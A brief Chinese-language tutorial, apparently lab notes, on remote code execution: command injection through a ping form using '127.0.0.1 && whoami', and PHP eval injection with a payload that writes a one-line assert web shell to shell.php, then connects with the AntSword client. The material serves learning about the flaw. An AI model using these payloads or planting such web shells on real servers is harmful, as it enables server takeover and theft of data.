RCE漏洞
可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。获取到后台服务器的文件信息
1、exec"ping"
测试点:比如常见的路由器、防火墙、入侵检测等设备的web管理界面上,一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。如果源码没有对输入做严格的安全控制,就会产生漏洞
&&符
127.0.0.1 && whoami 可以判断操作系统
linux系统中显示当前执行操作的用户名,windows系统中显示当前登录的域名和用户名),可以看到这里返回的是域名和用户名
dir 查看当前路径和路径下的文件
2、exec"eval"
(1)phpinfo();
phpinfo函数可以显示出PHP 所有相关信息。是排查配置php是是否出错或漏配置模块的主要方式之一!
(2)写入文件,上传木马
payload:fputs(fopen('shell.php','w'),'<?php assert($_POST[fin]);?>');
fputs的用法:用于写入文件
fputs(file,string,length)
file 必需。规定要写入的打开文件,shell.php是写入的文件名
string 必需。规定要写入文件的字符串,'<?php assert($_POST[fin]);?>' 是写入的文本内容
length 可选。规定要写入的最大字节数。
上传完之后,下面就是利用这个shell.php文件
使用中国蚁剑,添加数据,这里没有使用代理,添加完成之后,可以先测试连接,连接成功之后再添加
url地址是shell.php的路径,连接密码是shell.php的参数
下面就可以直接获取到后台数据